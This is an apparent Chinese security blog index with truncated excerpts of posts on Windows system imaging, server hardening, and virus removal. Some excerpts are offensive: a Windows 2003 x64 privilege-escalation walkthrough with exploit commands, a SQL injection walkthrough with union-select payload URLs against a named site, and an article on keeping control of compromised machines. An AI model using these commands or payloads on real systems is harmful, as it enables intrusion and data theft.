详细介绍制作 Windows 7 封装系统!

   
分类:技术 | 2012-02-16 | 撸过 1,419 次
0人扯蛋

   网上有很多的各种修改版的系统,如当年的xx花园,如x度,xx风等等,作为熟悉电脑的老手们是只使用纯净版系统的,毕竟,网上的修改版系统即使没有病毒木马,也给你塞了一堆你不喜欢的东西。

  可是,每次自己重装纯净版系统还是要安装很多自己常用的软件,还要去挨个做下系统配置来适应自己的习惯,自己家的电脑、公司的电脑都可能碰到这个问题,这个时候,我们就可以考虑动手DIY一个专属系统了,是的,这就是要封装。

  很多人都认为制作封装系统是一件很复杂、很高深的事情。事实上,真正做过1次封装系统以后,就会发觉做封装系统并不困难。

  只要具有一定电脑基础(会装操作系统、安装软件,能够比较熟练地使用[......]

继续阅读

恢复WINDOWS SERVER 2003的默认权限设置

   
分类:技术 | 2011-12-21 | 撸过 888 次
0人扯蛋

 

在对WIN2003进行安全配置的时候,经常一不小心就把权限设置乱掉,导致

 

ASP无法执行/PHP无法执行/某些服务无法启动等等奇怪故障,如果你对所有做过的权限设置都有记录的话,可以一步一步逆推回去来解决问题,如果没有记录,那么最简单的办法就是恢复默认权限.

仅需使用如下命令:

 

Secedit /configure /db %SYSTEMROOT%\security\database\cvtfs.sdb /Cfg

“%SYSTEMROOT%\security\templates\setup security.inf” /areas fi[......]

继续阅读

windows2003 x64 提权

   
分类:安全 | 2011-11-27 | 撸过 1,664 次
0人扯蛋

最近看到很多基友遇到x64的版本素手无策,我最开始遇到的时候也折腾了好久,就写一下我提权的过程吧,无技术含量,本人表达能力不好,不喜勿喷,高手请飘过。

什么PR,IIS6,IIS7溢出对64位的版本都没有效果,包括LPK DLL截持,网上公布的X64提权0day好像也只有一个有效,就这个吧ms10048 x64。

先谈谈64位exp提权与32位exp提权的区别吧,我们平时执行exp的时候都是

c:\recycler\cmd.exe

/c c:\recycler\exp.exe "cmd"

但是x64有点蛋疼,不知道为什么cmd后面不能带参数执行(等待大牛分析)

只能这样执行

c:[......]

继续阅读

windows服务器手工杀毒要掌握的命令

   
分类:技术 | 2011-11-25 | 撸过 999 次
0人扯蛋

作为站长我们有些时候是要手工清除服务器上的一些病毒,现在我司整理相关的网站资源,行文如下,希望“windows服务器手工杀毒要掌握的命令”这篇文章可以帮助vps主机和服务器托管用户彻底清除爱机上的病毒和木马!

 

【适合对象】

 

1、vps主机用户

 

2、服务器托管用户

 

3、服务器安全爱好者

 

一、TaskList命令备份系统进程

 

在刚装好系统的时候,最好使用TaskList命令将系统的进程做下备份,这样以后感觉电脑异常的时候可以通过比较进程列表,找出可能是病毒的进程

 

在命令提示[......]

继续阅读

win+php+mysql 注入实战篇

   
分类:安全 | 2011-11-18 | 撸过 1,386 次
0人扯蛋

http://www.webshell.cc/answer_view.php?id=10291' //有注入
//常理走:报表。现在mysql几乎都是高级版本。所以一般就不猜测它的版本了。

https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

4,8,2

//上火狐,报表.

https://www.webshell.cc/answer_view.php?id=10291%20[......]

继续阅读

Windows 系统密码破解全攻略

   
分类:技术 | 2011-11-4 | 撸过 1,654 次
0人扯蛋

此文章已发表在《黑客X档案》2009年第6期杂志上
后经作者发布在博客上,如转载请务必保留此信息!

引子

我一直在想,到底用什么样的方式才能较长时间地控制已经得到了权限的目标呢?留后门,种木马,甚至是Rootkit?留的Webshell痕迹太明显,哪怕是一句话的Webshell,都极容易被管理员清除。放了木马,也容易被有经验的管理员查出来,毕竟现在能做到无声无色的木马还是比较少。早期的是自己建个进程,结束掉进程就over了,后来有了注入进程的木马,再后来还有了以服务启动的木马,还有些是替换某些不要紧的系统自有服务来启动的……不过上述方法隐蔽性都太差了,不管你的后门留得如何完美,不管你的[......]

继续阅读

自动实时监控Windows2003服务器终端登录

   
分类:技术 | 2011-10-18 | 撸过 843 次
0人扯蛋

朋友一台Windows服务器被黑了,而且还被人恶意删除了一些数据备份,帮其做了下安全加固,考虑到服务器都是通过Windows 终端服务器来管理的,就想办法对其登录做个监控,找了个命令行下发邮件的小工具blat还有批处理,做了个简单的监控程序,功能是当有人通过终端登录且成功后,会向指定的邮箱发送登录者IP地址。

1.先下载blat解压缩到c盘blat目录下面。

2.任意目录新建一个bat文件,我这里是mail.bat,内容如下,

@echo off
date /t >mail.txt
time /t >>mail.txt
netstat -n -p tcp | find "[......]

继续阅读

妙用VBS脚本保护Windows操作系统安全性

   
分类:技术 | 2011-10-3 | 撸过 940 次
0人扯蛋

VBS脚本病毒的大量流行使我们对VBS的功能有了一个全新的认识,现在大家对它也开始重视起来。VBS代码在本地是通过Windows Script Host(WSH)解释执行的。VBS脚本的执行离不开WSH,WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。在Windows 2000下,还可用WSH来访问Windows NT活动目录服务。

用VBS编写的脚本程序在窗口界面是由wscript.exe文件解释执行的,在字符界面由cscrip[......]

继续阅读

架设基于windows2003的安全Asp.net服务器

   
分类:技术 | 2011-09-30 | 撸过 1,027 次
1人扯蛋

随着Microsoft Visual Studio 开发环境的普及,基于Asp .Net坏境的网站越来越多。因此Asp .net服务器的安全问题自然而然的成为了人们关心的问题。本文以Windows2003为例,架设一台安全的Asp .Net的服务器。

实验坏境:
操作系统:Microsoft Windows Server 2003 Enterprise Edition Service Pack 2
iis版本:6.0
架设Asp .Net的基本平台:
1. 安装Windows Server 2003:
 Windows Server 2003的具体安装方法这么不再讲述,但需要注意三点:
  [......]

继续阅读